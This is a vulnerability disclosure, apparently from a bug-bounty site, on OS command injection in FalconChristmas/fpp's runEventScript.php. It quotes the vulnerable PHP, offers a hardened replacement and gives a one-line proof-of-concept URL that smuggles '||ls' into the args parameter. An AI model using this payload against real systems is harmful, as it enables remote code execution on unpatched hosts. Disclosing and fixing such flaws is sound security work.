OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/runEventScript.php#L32 a shell command is built from unsanitized user input (the scriptName and args query parameters from $_GET) and passed straight to system():

<?php
if ((isset($_GET['scriptName'])) &&
    (file_exists($scriptDirectory . "/" . $_GET['scriptName'])))
{
    $script = $_GET['scriptName'];

    $args = "";
    if (isset($_GET['args']))
        $args = $_GET['args'];

    echo "Running $script $args<br><hr>\n";
    echo "<pre>\n";
    system($SUDO . " $fppDir/scripts/eventScript $scriptDirectory/$script $args"); // scripts and args are user-controlled
    echo "</pre>\n";
}
else
{
?>
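The following is an added hardened version of the handler above, written for this report and not code from the FalconChristmas/fpp project. It assumes, as the original excerpt does, that $SUDO, $fppDir and $scriptDirectory are already set by the surrounding page code. It closes both halves of the problem: scriptName is restricted to a plain file name that must resolve to a regular file inside $scriptDirectory (so an empty name or a traversal path no longer satisfies the existence check), and every argument is quoted with escapeshellarg() so shell metacharacters in args are passed as literal text rather than interpreted.

```php
<?php
// Added example, not FalconChristmas/fpp code. $SUDO, $fppDir and
// $scriptDirectory are assumed to be defined by the including page.

/**
 * Validate a user-supplied script name. Accepts only a single file name
 * (no path separators, no traversal) that resolves to a regular file inside
 * $scriptDirectory. Returns the canonical path, or null on any failure.
 */
function resolveScriptPath(string $scriptDirectory, string $scriptName): ?string
{
    // Allowlist: must start with an alphanumeric, then letters, digits, ".", "_", "-".
    // This rejects the empty string, "..", and anything containing "/" or "\".
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*$/', $scriptName)) {
        return null;
    }

    $base = realpath($scriptDirectory);
    $path = realpath($scriptDirectory . DIRECTORY_SEPARATOR . $scriptName);
    if ($base === false || $path === false) {
        return null;
    }

    // realpath() resolves symlinks, so a link pointing outside the directory
    // is caught here as well.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    // Directories pass file_exists(); require a regular file explicitly.
    return is_file($path) ? $path : null;
}

/**
 * Build the command line with every user-controlled token quoted.
 * The args string is split on whitespace and each piece is wrapped by
 * escapeshellarg(), so a value such as "||ls" becomes one literal argument.
 */
function buildEventScriptCommand(string $sudo, string $fppDir, string $scriptPath, string $args): string
{
    // $sudo is a trusted, operator-controlled constant in the original code.
    $cmd = ($sudo !== '' ? $sudo . ' ' : '')
         . escapeshellarg($fppDir . '/scripts/eventScript') . ' '
         . escapeshellarg($scriptPath);

    foreach (preg_split('/\s+/', trim($args), -1, PREG_SPLIT_NO_EMPTY) as $arg) {
        $cmd .= ' ' . escapeshellarg($arg);
    }
    return $cmd;
}

$script = isset($_GET['scriptName'])
    ? resolveScriptPath($scriptDirectory, (string) $_GET['scriptName'])
    : null;

if ($script === null) {
    http_response_code(400);
    echo "Invalid script name\n";
    exit;
}

$args = isset($_GET['args']) ? (string) $_GET['args'] : '';
$cmd  = buildEventScriptCommand($SUDO, $fppDir, $script, $args);

// Echo the values back HTML-encoded, as they originate from the request.
echo "Running " . htmlspecialchars(basename($script) . ' ' . $args, ENT_QUOTES, 'UTF-8') . "<br><hr>\n";
echo "<pre>\n";
system($cmd);
echo "</pre>\n";
```

Two points worth checking when applying a fix like this: the allowlist regex, not the file_exists() call, is what decides whether a name is acceptable, so the existence check alone should never be relied on; and quoting only neutralises the shell layer, so whatever eventScript does with the selected file and its arguments still has to be reviewed on its own.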

🕵️‍♂️ Proof of Concept

Visit: http://127.0.0.1/runEventScript.php?args=||ls&scriptName= . Make sure you satisfy the condition file_exists($scriptDirectory . "/" . $_GET['scriptName']) by building an empty directory named scripts in /media (with scriptName empty, the path resolves to the directory itself, and file_exists() returns true for directories).

💥 Impact

Remote code execution (RCE): arbitrary shell commands run on the host with the privileges of the web server process, prefixed by $SUDO where that is set.